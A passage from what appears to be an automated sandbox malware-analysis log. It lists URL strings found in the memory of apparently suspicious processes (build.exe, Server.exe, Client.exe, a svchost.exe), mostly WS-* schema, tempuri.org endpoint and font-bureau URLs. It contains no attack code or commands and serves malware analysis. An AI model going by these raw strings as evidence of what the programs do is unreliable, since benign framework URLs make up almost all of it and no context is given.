                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rmX
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                      Source: 3CBD.tmp.Installer.exe, 00000005.00000002.1941590624.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, 4336.tmp.Server.exe, 00000006.00000002.3152347475.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, 476D.tmp.Server.exe, 00000009.00000002.2874806986.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, accc.exe, 0000000B.00000002.3143963860.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, 5087.tmp.update.exe, 0000000E.00000002.2095704106.0000000002A98000.00000004.00000800.00020000.00000000.sdmp, 5E16.tmp.aaa.exe, 00000013.00000002.3142832732.0000000002B7B000.00000004.00000800.00020000.00000000.sdmp, 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.3152328073.0000000002801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/:hardwares.
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/D
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000003023000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000003023000.00000004.00000800.00020000.00000000.sdmp, 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11ResponseD
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12ResponseD
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, 62AB.tmp.build.exe, 00000014.00000002.2394089953.000000000311E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, 62AB.tmp.build.exe, 00000014.00000002.2394089953.000000000311E000.00000004.00000800.00020000.00000000.sdmp, 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002EF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.000000000311E000.00000004.00000800.00020000.00000000.sdmp, 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002EF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13ResponseD
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000003023000.00000004.00000800.00020000.00000000.sdmp, 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14ResponseD
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000003023000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14V
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.000000000311E000.00000004.00000800.00020000.00000000.sdmp, 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002EF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15ResponseD
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002EF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16ResponseD
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.000000000311E000.00000004.00000800.00020000.00000000.sdmp, 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002EF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17ResponseD
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.000000000311E000.00000004.00000800.00020000.00000000.sdmp, 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002EF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18ResponseD
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000003103000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.000000000311E000.00000004.00000800.00020000.00000000.sdmp, 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002EF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19ResponseD
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1ResponseD
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20ResponseD
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21ResponseD
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002EF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22ResponseD
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002EF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23ResponseD
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Response
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2ResponseD
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4ResponseD
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002EF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5ResponseD
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6ResponseD
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002EF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002EF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7ResponseD
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8ResponseD
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.000000000310B000.00000004.00000800.00020000.00000000.sdmp, 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002EF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9ResponseD
                      Source: accc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: accc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                      Source: accc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                      Source: accc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                      Source: accc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: accc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: accc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
